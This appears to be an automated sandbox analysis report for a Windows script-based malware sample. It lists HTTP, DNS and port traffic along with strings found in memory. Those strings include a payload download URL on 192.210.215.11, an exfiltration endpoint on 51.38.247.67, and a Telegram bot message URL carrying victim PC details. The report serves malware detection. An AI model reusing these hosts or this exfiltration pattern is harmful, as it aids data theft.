Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: smtp.gmail.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:54:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:55:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 28 Aug 2024 04:55:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.2
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.21
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.20
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.21
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.1
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zj
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoM
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoo0
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/a
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/au
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1.b
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1.jD
Source: wscript.exe, 00000000.00000002.1758128774.0000029C27830000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752536179.0000029C259FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752798661.0000029C25A18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1757769338.0000029C259AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1757937366.0000029C25A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1757898494.0000029C25A24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756160856.0000029C25A24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758042084.0000029C25B65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758288755.0000029C2796B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756782671.0000029C27AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757040288.0000029C25A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756395173.0000029C259AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1.js
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1.js&
Source: wscript.exe, 00000000.00000003.1753041441.0000029C27962000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757238033.0000029C27969000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758288755.0000029C2796B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/aus1.jsHe
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.L
Source: wscript.exe, 00000000.00000003.1752759259.0000029C259E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210h
Source: PbsonX.exe, 00000007.00000002.2990666211.0000000003492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Service.exe, 0000001D.00000002.2959658018.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 0000001F.00000002.2982055964.00000000034C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/75r4ZyA3vA0.crl0
Source: Service.exe, 0000001D.00000002.2959658018.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 0000001F.00000002.2982055964.00000000034C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: Service.exe, 0000001D.00000002.2959658018.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 0000001F.00000002.2982055964.00000000034C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: PbsonX.exe, 00000007.00000002.2990666211.0000000003492000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000001F.00000002.2982055964.00000000034C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.gmail.com
Source: PbsonX.exe, 00000009.00000002.2977007096.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: PbsonX.exe, 00000009.00000002.2977007096.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: PbsonX.exe, 00000009.00000002.2977007096.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PbsonX.exe, 00000009.00000002.2977007096.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20a
Source: wscript.exe, 00000000.00000003.1753041441.0000029C27962000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757238033.0000029C27969000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758288755.0000029C2796B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: PbsonX.exe, 00000008.00000002.2973181708.000000000247A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/a/answer/3221692
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
